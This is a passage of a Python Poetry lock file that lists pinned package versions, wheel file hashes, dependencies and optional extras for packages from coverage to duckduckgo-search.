"coverage-7.3.2-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d8f17966e861ff97305e0801134e69db33b143bbfb36436efb9cfff6ec7b2fd9"}, {file = "coverage-7.3.2-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:b4275802d16882cf9c8b3d057a0839acb07ee9379fa2749eca54efbce1535b82"}, {file = "coverage-7.3.2-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:72c0cfa5250f483181e677ebc97133ea1ab3eb68645e494775deb6a7f6f83901"}, {file = "coverage-7.3.2-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:cb536f0dcd14149425996821a168f6e269d7dcd2c273a8bff8201e79f5104e76"}, {file = "coverage-7.3.2-cp38-cp38-win32.whl", hash = "sha256:307adb8bd3abe389a471e649038a71b4eb13bfd6b7dd9a129fa856f5c695cf92"}, {file = "coverage-7.3.2-cp38-cp38-win_amd64.whl", hash = "sha256:88ed2c30a49ea81ea3b7f172e0269c182a44c236eb394718f976239892c0a27a"}, {file = "coverage-7.3.2-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:b631c92dfe601adf8f5ebc7fc13ced6bb6e9609b19d9a8cd59fa47c4186ad1ce"}, {file = "coverage-7.3.2-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:d3d9df4051c4a7d13036524b66ecf7a7537d14c18a384043f30a303b146164e9"}, {file = "coverage-7.3.2-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5f7363d3b6a1119ef05015959ca24a9afc0ea8a02c687fe7e2d557705375c01f"}, {file = "coverage-7.3.2-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:2f11cc3c967a09d3695d2a6f03fb3e6236622b93be7a4b5dc09166a861be6d25"}, {file = "coverage-7.3.2-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:149de1d2401ae4655c436a3dced6dd153f4c3309f599c3d4bd97ab172eaf02d9"}, {file = "coverage-7.3.2-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:3a4006916aa6fee7cd38db3bfc95aa9c54ebb4ffbfc47c677c8bba949ceba0a6"}, {file = "coverage-7.3.2-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:9028a3871280110d6e1aa2df1afd5ef003bab5fb1ef421d6dc748ae1c8ef2ebc"}, {file = "coverage-7.3.2-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:9f805d62aec8eb92bab5b61c0f07329275b6f41c97d80e847b03eb894f38d083"}, {file = "coverage-7.3.2-cp39-cp39-win32.whl", hash = "sha256:d1c88ec1a7ff4ebca0219f5b1ef863451d828cccf889c173e1253aa84b1e07ce"}, {file = "coverage-7.3.2-cp39-cp39-win_amd64.whl", hash = "sha256:b4767da59464bb593c07afceaddea61b154136300881844768037fd5e859353f"}, {file = "coverage-7.3.2-pp38.pp39.pp310-none-any.whl", hash = "sha256:ae97af89f0fbf373400970c0a21eef5aa941ffeed90aee43650b81f7d7f47637"}, {file = "coverage-7.3.2.tar.gz", hash = "sha256:be32ad29341b0170e795ca590e1c07e81fc061cb5b10c74ce7203491484404ef"}, ] [package.dependencies] tomli = {version = "*", optional = true, markers = "python_full_version <= \"3.11.0a6\" and extra == \"toml\""} [package.extras] toml = ["tomli"] [[package]] name = "cryptography" version = "41.0.5" description = "cryptography is a package which provides cryptographic recipes and primitives to Python developers." 
optional = false python-versions = ">=3.7" files = [ {file = "cryptography-41.0.5-cp37-abi3-macosx_10_12_universal2.whl", hash = "sha256:da6a0ff8f1016ccc7477e6339e1d50ce5f59b88905585f77193ebd5068f1e797"}, {file = "cryptography-41.0.5-cp37-abi3-macosx_10_12_x86_64.whl", hash = "sha256:b948e09fe5fb18517d99994184854ebd50b57248736fd4c720ad540560174ec5"}, {file = "cryptography-41.0.5-cp37-abi3-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d38e6031e113b7421db1de0c1b1f7739564a88f1684c6b89234fbf6c11b75147"}, {file = "cryptography-41.0.5-cp37-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e270c04f4d9b5671ebcc792b3ba5d4488bf7c42c3c241a3748e2599776f29696"}, {file = "cryptography-41.0.5-cp37-abi3-manylinux_2_28_aarch64.whl", hash = "sha256:ec3b055ff8f1dce8e6ef28f626e0972981475173d7973d63f271b29c8a2897da"}, {file = "cryptography-41.0.5-cp37-abi3-manylinux_2_28_x86_64.whl", hash = "sha256:7d208c21e47940369accfc9e85f0de7693d9a5d843c2509b3846b2db170dfd20"}, {file = "cryptography-41.0.5-cp37-abi3-musllinux_1_1_aarch64.whl", hash = "sha256:8254962e6ba1f4d2090c44daf50a547cd5f0bf446dc658a8e5f8156cae0d8548"}, {file = "cryptography-41.0.5-cp37-abi3-musllinux_1_1_x86_64.whl", hash = "sha256:a48e74dad1fb349f3dc1d449ed88e0017d792997a7ad2ec9587ed17405667e6d"}, {file = "cryptography-41.0.5-cp37-abi3-win32.whl", hash = "sha256:d3977f0e276f6f5bf245c403156673db103283266601405376f075c849a0b936"}, {file = "cryptography-41.0.5-cp37-abi3-win_amd64.whl", hash = "sha256:73801ac9736741f220e20435f84ecec75ed70eda90f781a148f1bad546963d81"}, {file = "cryptography-41.0.5-pp310-pypy310_pp73-macosx_10_12_x86_64.whl", hash = "sha256:3be3ca726e1572517d2bef99a818378bbcf7d7799d5372a46c79c29eb8d166c1"}, {file = "cryptography-41.0.5-pp310-pypy310_pp73-manylinux_2_28_aarch64.whl", hash = "sha256:e886098619d3815e0ad5790c973afeee2c0e6e04b4da90b88e6bd06e2a0b1b72"}, {file = "cryptography-41.0.5-pp310-pypy310_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:573eb7128cbca75f9157dcde974781209463ce56b5804983e11a1c462f0f4e88"}, {file = "cryptography-41.0.5-pp310-pypy310_pp73-win_amd64.whl", hash = "sha256:0c327cac00f082013c7c9fb6c46b7cc9fa3c288ca702c74773968173bda421bf"}, {file = "cryptography-41.0.5-pp38-pypy38_pp73-macosx_10_12_x86_64.whl", hash = "sha256:227ec057cd32a41c6651701abc0328135e472ed450f47c2766f23267b792a88e"}, {file = "cryptography-41.0.5-pp38-pypy38_pp73-manylinux_2_28_aarch64.whl", hash = "sha256:22892cc830d8b2c89ea60148227631bb96a7da0c1b722f2aac8824b1b7c0b6b8"}, {file = "cryptography-41.0.5-pp38-pypy38_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:5a70187954ba7292c7876734183e810b728b4f3965fbe571421cb2434d279179"}, {file = "cryptography-41.0.5-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:88417bff20162f635f24f849ab182b092697922088b477a7abd6664ddd82291d"}, {file = "cryptography-41.0.5-pp39-pypy39_pp73-macosx_10_12_x86_64.whl", hash = "sha256:c707f7afd813478e2019ae32a7c49cd932dd60ab2d2a93e796f68236b7e1fbf1"}, {file = "cryptography-41.0.5-pp39-pypy39_pp73-manylinux_2_28_aarch64.whl", hash = "sha256:580afc7b7216deeb87a098ef0674d6ee34ab55993140838b14c9b83312b37b86"}, {file = "cryptography-41.0.5-pp39-pypy39_pp73-manylinux_2_28_x86_64.whl", hash = "sha256:fba1e91467c65fe64a82c689dc6cf58151158993b13eb7a7f3f4b7f395636723"}, {file = "cryptography-41.0.5-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:0d2a6a598847c46e3e321a7aef8af1436f11c27f1254933746304ff014664d84"}, {file = "cryptography-41.0.5.tar.gz", hash = "sha256:392cb88b597247177172e02da6b7a63deeff1937fa6fec3bbf902ebd75d97ec7"}, ] 
[package.dependencies] cffi = ">=1.12" [package.extras] docs = ["sphinx (>=5.3.0)", "sphinx-rtd-theme (>=1.1.1)"] docstest = ["pyenchant (>=1.6.11)", "sphinxcontrib-spelling (>=4.0.1)", "twine (>=1.12.0)"] nox = ["nox"] pep8test = ["black", "check-sdist", "mypy", "ruff"] sdist = ["build"] ssh = ["bcrypt (>=3.1.5)"] test = ["pretend", "pytest (>=6.2.0)", "pytest-benchmark", "pytest-cov", "pytest-xdist"] test-randomorder = ["pytest-randomly"] [[package]] name = "cssselect" version = "1.2.0" description = "cssselect parses CSS3 Selectors and translates them to XPath 1.0" optional = true python-versions = ">=3.7" files = [ {file = "cssselect-1.2.0-py2.py3-none-any.whl", hash = "sha256:da1885f0c10b60c03ed5eccbb6b68d6eff248d91976fcde348f395d54c9fd35e"}, {file = "cssselect-1.2.0.tar.gz", hash = "sha256:666b19839cfaddb9ce9d36bfe4c969132c647b92fc9088c4e23f786b30f1b3dc"}, ] [[package]] name = "dashvector" version = "1.0.5" description = "DashVector Client Python Sdk Library" optional = true python-versions = ">=3.7,<4.0" files = [ {file = "dashvector-1.0.5-py3-none-any.whl", hash = "sha256:a79e5bdb0d6447706cbf3645d9f1d07fa8e280d74842491aaa54e74258def2d6"}, {file = "dashvector-1.0.5.tar.gz", hash = "sha256:2ee9a8c26699b9d978e7d84ff1cd92fa7ea5411c557ef5fb2a3fea02bd9999c4"}, ] [package.dependencies] aiohttp = ">=3.1.0,<4.0.0" grpcio = [ {version = ">=1.49.1", markers = "python_version >= \"3.11\""}, {version = ">=1.22.0", markers = "python_version < \"3.11\""}, ] numpy = "*" protobuf = ">=3.8.0,<4.0.0" [[package]] name = "dataclasses-json" version = "0.6.1" description = "Easily serialize dataclasses to and from JSON." optional = false python-versions = ">=3.7,<4.0" files = [ {file = "dataclasses_json-0.6.1-py3-none-any.whl", hash = "sha256:1bd8418a61fe3d588bb0079214d7fb71d44937da40742b787256fd53b26b6c80"}, {file = "dataclasses_json-0.6.1.tar.gz", hash = "sha256:a53c220c35134ce08211a1057fd0e5bf76dc5331627c6b241cacbc570a89faae"}, ] [package.dependencies] marshmallow = ">=3.18.0,<4.0.0" typing-inspect = ">=0.4.0,<1" [[package]] name = "debugpy" version = "1.8.0" description = "An implementation of the Debug Adapter Protocol for Python" optional = false python-versions = ">=3.8" files = [ {file = "debugpy-1.8.0-cp310-cp310-macosx_11_0_x86_64.whl", hash = "sha256:7fb95ca78f7ac43393cd0e0f2b6deda438ec7c5e47fa5d38553340897d2fbdfb"}, {file = "debugpy-1.8.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ef9ab7df0b9a42ed9c878afd3eaaff471fce3fa73df96022e1f5c9f8f8c87ada"}, {file = "debugpy-1.8.0-cp310-cp310-win32.whl", hash = "sha256:a8b7a2fd27cd9f3553ac112f356ad4ca93338feadd8910277aff71ab24d8775f"}, {file = "debugpy-1.8.0-cp310-cp310-win_amd64.whl", hash = "sha256:5d9de202f5d42e62f932507ee8b21e30d49aae7e46d5b1dd5c908db1d7068637"}, {file = "debugpy-1.8.0-cp311-cp311-macosx_11_0_universal2.whl", hash = "sha256:ef54404365fae8d45cf450d0544ee40cefbcb9cb85ea7afe89a963c27028261e"}, {file = "debugpy-1.8.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:60009b132c91951354f54363f8ebdf7457aeb150e84abba5ae251b8e9f29a8a6"}, {file = "debugpy-1.8.0-cp311-cp311-win32.whl", hash = "sha256:8cd0197141eb9e8a4566794550cfdcdb8b3db0818bdf8c49a8e8f8053e56e38b"}, {file = "debugpy-1.8.0-cp311-cp311-win_amd64.whl", hash = "sha256:a64093656c4c64dc6a438e11d59369875d200bd5abb8f9b26c1f5f723622e153"}, {file = "debugpy-1.8.0-cp38-cp38-macosx_11_0_x86_64.whl", hash = "sha256:b05a6b503ed520ad58c8dc682749113d2fd9f41ffd45daec16e558ca884008cd"}, {file = 
"debugpy-1.8.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3c6fb41c98ec51dd010d7ed650accfd07a87fe5e93eca9d5f584d0578f28f35f"}, {file = "debugpy-1.8.0-cp38-cp38-win32.whl", hash = "sha256:46ab6780159eeabb43c1495d9c84cf85d62975e48b6ec21ee10c95767c0590aa"}, {file = "debugpy-1.8.0-cp38-cp38-win_amd64.whl", hash = "sha256:bdc5ef99d14b9c0fcb35351b4fbfc06ac0ee576aeab6b2511702e5a648a2e595"}, {file = "debugpy-1.8.0-cp39-cp39-macosx_11_0_x86_64.whl", hash = "sha256:61eab4a4c8b6125d41a34bad4e5fe3d2cc145caecd63c3fe953be4cc53e65bf8"}, {file = "debugpy-1.8.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:125b9a637e013f9faac0a3d6a82bd17c8b5d2c875fb6b7e2772c5aba6d082332"}, {file = "debugpy-1.8.0-cp39-cp39-win32.whl", hash = "sha256:57161629133113c97b387382045649a2b985a348f0c9366e22217c87b68b73c6"}, {file = "debugpy-1.8.0-cp39-cp39-win_amd64.whl", hash = "sha256:e3412f9faa9ade82aa64a50b602544efcba848c91384e9f93497a458767e6926"}, {file = "debugpy-1.8.0-py2.py3-none-any.whl", hash = "sha256:9c9b0ac1ce2a42888199df1a1906e45e6f3c9555497643a85e0bf2406e3ffbc4"}, {file = "debugpy-1.8.0.zip", hash = "sha256:12af2c55b419521e33d5fb21bd022df0b5eb267c3e178f1d374a63a2a6bdccd0"}, ] [[package]] name = "decorator" version = "5.1.1" description = "Decorators for Humans" optional = false python-versions = ">=3.5" files = [ {file = "decorator-5.1.1-py3-none-any.whl", hash = "sha256:b8c3f85900b9dc423225913c5aace94729fe1fa9763b38939a95226f02d37186"}, {file = "decorator-5.1.1.tar.gz", hash = "sha256:637996211036b6385ef91435e4fae22989472f9d571faba8927ba8253acbc330"}, ] [[package]] name = "deeplake" version = "3.8.3" description = "Activeloop Deep Lake" optional = true python-versions = "*" files = [ {file = "deeplake-3.8.3.tar.gz", hash = "sha256:db6ea8b50549bab35579c2a6d70888356162d9aa89c18b55c16a9f5aeaf4a5fe"}, ] [package.dependencies] aioboto3 = {version = ">=10.4.0", markers = "python_version >= \"3.7\" and sys_platform != \"win32\""} boto3 = "*" click = "*" humbug = ">=0.3.1" libdeeplake = "0.0.84" lz4 = "*" nest_asyncio = {version = "*", markers = "python_version >= \"3.7\" and sys_platform != \"win32\""} numpy = "*" pathos = "*" pillow = "*" pyjwt = "*" tqdm = "*" [package.extras] all = ["IPython", "av (>=8.1.0)", "azure-cli", "azure-identity", "azure-storage-blob", "flask", "google-api-python-client (>=2.31.0,<2.32.0)", "google-auth (>=2.0.1,<2.1.0)", "google-auth-oauthlib (>=0.4.5,<0.5.0)", "google-cloud-storage (>=1.42.0,<1.43.0)", "laspy", "libdeeplake (==0.0.84)", "nibabel", "oauth2client (>=4.1.3,<4.2.0)", "pydicom"] audio = ["av (>=8.1.0)"] av = ["av (>=8.1.0)"] azure = ["azure-cli", "azure-identity", "azure-storage-blob"] dicom = ["nibabel", "pydicom"] enterprise = ["libdeeplake (==0.0.84)", "pyjwt"] gcp = ["google-auth (>=2.0.1,<2.1.0)", "google-auth-oauthlib (>=0.4.5,<0.5.0)", "google-cloud-storage (>=1.42.0,<1.43.0)"] gdrive = ["google-api-python-client (>=2.31.0,<2.32.0)", "google-auth (>=2.0.1,<2.1.0)", "google-auth-oauthlib (>=0.4.5,<0.5.0)", "oauth2client (>=4.1.3,<4.2.0)"] medical = ["nibabel", "pydicom"] point-cloud = ["laspy"] video = ["av (>=8.1.0)"] visualizer = ["IPython", "flask"] [[package]] name = "defusedxml" version = "0.7.1" description = "XML bomb protection for Python stdlib modules" optional = false python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*" files = [ {file = "defusedxml-0.7.1-py2.py3-none-any.whl", hash = "sha256:a352e7e428770286cc899e2542b6cdaedb2b4953ff269a210103ec58f6198a61"}, {file = 
"defusedxml-0.7.1.tar.gz", hash = "sha256:1bb3032db185915b62d7c6209c5a8792be6a32ab2fedacc84e01b52c51aa3e69"}, ] [[package]] name = "deprecated" version = "1.2.14" description = "Python @deprecated decorator to deprecate old python classes, functions or methods." optional = true python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*" files = [ {file = "Deprecated-1.2.14-py2.py3-none-any.whl", hash = "sha256:6fac8b097794a90302bdbb17b9b815e732d3c4720583ff1b198499d78470466c"}, {file = "Deprecated-1.2.14.tar.gz", hash = "sha256:e5323eb936458dccc2582dc6f9c322c852a775a27065ff2b0c4970b9d53d01b3"}, ] [package.dependencies] wrapt = ">=1.10,<2" [package.extras] dev = ["PyTest", "PyTest-Cov", "bump2version (<1)", "sphinx (<2)", "tox"] [[package]] name = "deprecation" version = "2.1.0" description = "A library to handle automated deprecations" optional = true python-versions = "*" files = [ {file = "deprecation-2.1.0-py2.py3-none-any.whl", hash = "sha256:a10811591210e1fb0e768a8c25517cabeabcba6f0bf96564f8ff45189f90b14a"}, {file = "deprecation-2.1.0.tar.gz", hash = "sha256:72b3bde64e5d778694b0cf68178aed03d15e15477116add3fb773e581f9518ff"}, ] [package.dependencies] packaging = "*" [[package]] name = "dill" version = "0.3.7" description = "serialize all of Python" optional = true python-versions = ">=3.7" files = [ {file = "dill-0.3.7-py3-none-any.whl", hash = "sha256:76b122c08ef4ce2eedcd4d1abd8e641114bfc6c2867f49f3c41facf65bf19f5e"}, {file = "dill-0.3.7.tar.gz", hash = "sha256:cc1c8b182eb3013e24bd475ff2e9295af86c1a38eb1aff128dac8962a9ce3c03"}, ] [package.extras] graph = ["objgraph (>=1.7.2)"] [[package]] name = "distro" version = "1.8.0" description = "Distro - an OS platform information API" optional = false python-versions = ">=3.6" files = [ {file = "distro-1.8.0-py3-none-any.whl", hash = "sha256:99522ca3e365cac527b44bde033f64c6945d90eb9f769703caaec52b09bbd3ff"}, {file = "distro-1.8.0.tar.gz", hash = "sha256:02e111d1dc6a50abb8eed6bf31c3e48ed8b0830d1ea2a1b78c61765c2513fdd8"}, ] [[package]] name = "dnspython" version = "2.4.2" description = "DNS toolkit" optional = true python-versions = ">=3.8,<4.0" files = [ {file = "dnspython-2.4.2-py3-none-any.whl", hash = "sha256:57c6fbaaeaaf39c891292012060beb141791735dbb4004798328fc2c467402d8"}, {file = "dnspython-2.4.2.tar.gz", hash = "sha256:8dcfae8c7460a2f84b4072e26f1c9f4101ca20c071649cb7c34e8b6a93d58984"}, ] [package.extras] dnssec = ["cryptography (>=2.6,<42.0)"] doh = ["h2 (>=4.1.0)", "httpcore (>=0.17.3)", "httpx (>=0.24.1)"] doq = ["aioquic (>=0.9.20)"] idna = ["idna (>=2.1,<4.0)"] trio = ["trio (>=0.14,<0.23)"] wmi = ["wmi (>=1.5.1,<2.0.0)"] [[package]] name = "docarray" version = "0.32.1" description = "The data structure for multimodal data" optional = true python-versions = ">=3.7,<4.0" files = [ {file = "docarray-0.32.1-py3-none-any.whl", hash = "sha256:abd6d8999f44fd37b0c1d54f7cedd9007ab13b8b6c69933a9d30abbd0cbad5cd"}, {file = "docarray-0.32.1.tar.gz", hash = "sha256:ef349d2501d5cb0f205497e5e7de5b5d034965bdad98cf6daab1baa6aa3e39d2"}, ] [package.dependencies] hnswlib = {version = ">=0.6.2", optional = true, markers = "extra == \"hnswlib\""} numpy = ">=1.17.3" orjson = ">=3.8.2" protobuf = {version = ">=3.19.0", optional = true, markers = "extra == \"proto\" or extra == \"hnswlib\" or extra == \"full\""} pydantic = ">=1.10.2" rich = ">=13.1.0" types-requests = ">=2.28.11.6" typing-inspect = ">=0.8.0" [package.extras] audio = ["pydub (>=0.25.1,<0.26.0)"] aws = ["smart-open[s3] (>=6.3.0)"] elasticsearch = ["elastic-transport (>=8.4.0,<9.0.0)", 
"elasticsearch (>=7.10.1)"] full = ["av (>=10.0.0)", "lz4 (>=1.0.0)", "pandas (>=1.1.0)", "pillow (>=9.3.0)", "protobuf (>=3.19.0)", "pydub (>=0.25.1,<0.26.0)", "trimesh[easy] (>=3.17.1)", "types-pillow (>=9.3.0.1)"] hnswlib = ["hnswlib (>=0.6.2)", "protobuf (>=3.19.0)"] image = ["pillow (>=9.3.0)", "types-pillow (>=9.3.0.1)"] jac = ["jina-hubble-sdk (>=0.34.0)"] mesh = ["trimesh[easy] (>=3.17.1)"] pandas = ["pandas (>=1.1.0)"] proto = ["lz4 (>=1.0.0)", "protobuf (>=3.19.0)"] qdrant = ["qdrant-client (>=1.1.4)"] torch = ["torch (>=1.0.0)"] video = ["av (>=10.0.0)"] weaviate = ["weaviate-client (>=3.15)"] web = ["fastapi (>=0.87.0)"] [[package]] name = "docker" version = "6.1.3" description = "A Python library for the Docker Engine API." optional = true python-versions = ">=3.7" files = [ {file = "docker-6.1.3-py3-none-any.whl", hash = "sha256:aecd2277b8bf8e506e484f6ab7aec39abe0038e29fa4a6d3ba86c3fe01844ed9"}, {file = "docker-6.1.3.tar.gz", hash = "sha256:aa6d17830045ba5ef0168d5eaa34d37beeb113948c413affe1d5991fc11f9a20"}, ] [package.dependencies] packaging = ">=14.0" pywin32 = {version = ">=304", markers = "sys_platform == \"win32\""} requests = ">=2.26.0" urllib3 = ">=1.26.0" websocket-client = ">=0.32.0" [package.extras] ssh = ["paramiko (>=2.4.3)"] [[package]] name = "docopt" version = "0.6.2" description = "Pythonic argument parser, that will make you smile" optional = true python-versions = "*" files = [ {file = "docopt-0.6.2.tar.gz", hash = "sha256:49b3a825280bd66b3aa83585ef59c4a8c82f2c8a522dbe754a8bc8d08c85c491"}, ] [[package]] name = "duckdb" version = "0.9.1" description = "DuckDB embedded database" optional = false python-versions = ">=3.7.0" files = [ {file = "duckdb-0.9.1-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:6c724e105ecd78c8d86b3c03639b24e1df982392fc836705eb007e4b1b488864"}, {file = "duckdb-0.9.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:75f12c5a3086079fb6440122565f1762ef1a610a954f2d8081014c1dd0646e1a"}, {file = "duckdb-0.9.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:151f5410c32f8f8fe03bf23462b9604349bc0b4bd3a51049bbf5e6a482a435e8"}, {file = "duckdb-0.9.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9c1d066fdae22b9b711b1603541651a378017645f9fbc4adc9764b2f3c9e9e4a"}, {file = "duckdb-0.9.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1de56d8b7bd7a7653428c1bd4b8948316df488626d27e9c388194f2e0d1428d4"}, {file = "duckdb-0.9.1-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:1fb6cd590b1bb4e31fde8efd25fedfbfa19a86fa72789fa5b31a71da0d95bce4"}, {file = "duckdb-0.9.1-cp310-cp310-win32.whl", hash = "sha256:1039e073714d668cef9069bb02c2a6756c7969cedda0bff1332520c4462951c8"}, {file = "duckdb-0.9.1-cp310-cp310-win_amd64.whl", hash = "sha256:7e6ac4c28918e1d278a89ff26fd528882aa823868ed530df69d6c8a193ae4e41"}, {file = "duckdb-0.9.1-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:5eb750f2ee44397a61343f32ee9d9e8c8b5d053fa27ba4185d0e31507157f130"}, {file = "duckdb-0.9.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:aea2a46881d75dc069a242cb164642d7a4f792889010fb98210953ab7ff48849"}, {file = "duckdb-0.9.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:ed3dcedfc7a9449b6d73f9a2715c730180056e0ba837123e7967be1cd3935081"}, {file = "duckdb-0.9.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0c55397bed0087ec4445b96f8d55f924680f6d40fbaa7f2e35468c54367214a5"}, {file = "duckdb-0.9.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = 
"sha256:3261696130f1cfb955735647c93297b4a6241753fb0de26c05d96d50986c6347"}, {file = "duckdb-0.9.1-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:64c04b1728e3e37cf93748829b5d1e028227deea75115bb5ead01c608ece44b1"}, {file = "duckdb-0.9.1-cp311-cp311-win32.whl", hash = "sha256:12cf9fb441a32702e31534330a7b4d569083d46a91bf185e0c9415000a978789"}, {file = "duckdb-0.9.1-cp311-cp311-win_amd64.whl", hash = "sha256:fdfd85575ce9540e593d5d25c9d32050bd636c27786afd7b776aae0f6432b55e"}, {file = "duckdb-0.9.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:704700a4b469e3bb1a7e85ac12e58037daaf2b555ef64a3fe2913ffef7bd585b"}, {file = "duckdb-0.9.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cf55b303b7b1a8c2165a96e609eb30484bc47481d94a5fb1e23123e728df0a74"}, {file = "duckdb-0.9.1-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b70e23c14746904ca5de316436e43a685eb769c67fe3dbfaacbd3cce996c5045"}, {file = "duckdb-0.9.1-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:77379f7f1f8b4dc98e01f8f6f8f15a0858cf456e2385e22507f3cb93348a88f9"}, {file = "duckdb-0.9.1-cp37-cp37m-win32.whl", hash = "sha256:92c8f738489838666cae9ef41703f8b16f660bb146970d1eba8b2c06cb3afa39"}, {file = "duckdb-0.9.1-cp37-cp37m-win_amd64.whl", hash = "sha256:08c5484ac06ab714f745526d791141f547e2f5ac92f97a0a1b37dfbb3ea1bd13"}, {file = "duckdb-0.9.1-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:f66d3c07c7f6938d3277294677eb7dad75165e7c57c8dd505503fc5ef10f67ad"}, {file = "duckdb-0.9.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:c38044e5f78c0c7b58e9f937dcc6c34de17e9ca6be42f9f8f1a5a239f7a847a5"}, {file = "duckdb-0.9.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:73bc0d715b79566b3ede00c367235cfcce67be0eddda06e17665c7a233d6854a"}, {file = "duckdb-0.9.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d26622c3b4ea6a8328d95882059e3cc646cdc62d267d48d09e55988a3bba0165"}, {file = "duckdb-0.9.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3367d10096ff2b7919cedddcf60d308d22d6e53e72ee2702f6e6ca03d361004a"}, {file = "duckdb-0.9.1-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:d88a119f1cb41911a22f08a6f084d061a8c864e28b9433435beb50a56b0d06bb"}, {file = "duckdb-0.9.1-cp38-cp38-win32.whl", hash = "sha256:99567496e45b55c67427133dc916013e8eb20a811fc7079213f5f03b2a4f5fc0"}, {file = "duckdb-0.9.1-cp38-cp38-win_amd64.whl", hash = "sha256:5b3da4da73422a3235c3500b3fb541ac546adb3e35642ef1119dbcd9cc7f68b8"}, {file = "duckdb-0.9.1-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:eca00c0c2062c0265c6c0e78ca2f6a30611b28f3afef062036610e9fc9d4a67d"}, {file = "duckdb-0.9.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:eb5af8e89d40fc4baab1515787ea1520a6c6cf6aa40ab9f107df6c3a75686ce1"}, {file = "duckdb-0.9.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:9fae3d4f83ebcb47995f6acad7c6d57d003a9b6f0e1b31f79a3edd6feb377443"}, {file = "duckdb-0.9.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:16b9a7efc745bc3c5d1018c3a2f58d9e6ce49c0446819a9600fdba5f78e54c47"}, {file = "duckdb-0.9.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:66b0b60167f5537772e9f5af940e69dcf50e66f5247732b8bb84a493a9af6055"}, {file = "duckdb-0.9.1-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:4f27f5e94c47df6c4ccddf18e3277b7464eea3db07356d2c4bf033b5c88359b8"}, {file = "duckdb-0.9.1-cp39-cp39-win32.whl", hash = "sha256:d43cd7e6f783006b59dcc5e40fcf157d21ee3d0c8dfced35278091209e9974d7"}, {file = 
"duckdb-0.9.1-cp39-cp39-win_amd64.whl", hash = "sha256:e666795887d9cf1d6b6f6cbb9d487270680e5ff6205ebc54b2308151f13b8cff"}, {file = "duckdb-0.9.1.tar.gz", hash = "sha256:603a878746015a3f2363a65eb48bcbec816261b6ee8d71eee53061117f6eef9d"}, ] [[package]] name = "duckdb-engine" version = "0.9.2" description = "SQLAlchemy driver for duckdb" optional = false python-versions = ">=3.7" files = [ {file = "duckdb_engine-0.9.2-py3-none-any.whl", hash = "sha256:764e83dfb37e2f0ce6afcb8e701299e7b28060a40fdae86cfd7f08e0fca4496a"}, {file = "duckdb_engine-0.9.2.tar.gz", hash = "sha256:efcd7b468f9b17e4480a97f0c60eade25cc081e8cfc04c46d63828677964b48f"}, ] [package.dependencies] duckdb = ">=0.4.0" sqlalchemy = ">=1.3.22" [[package]] name = "duckduckgo-search" version = "3.9.3" description = "Search for words, documents, images, news, maps and text translation using the DuckDuckGo.com search engine." optional = true python-versions = ">=3.8" files = [ {file = "duckduckgo_search-3.9.3-py3-none-any.whl", hash = 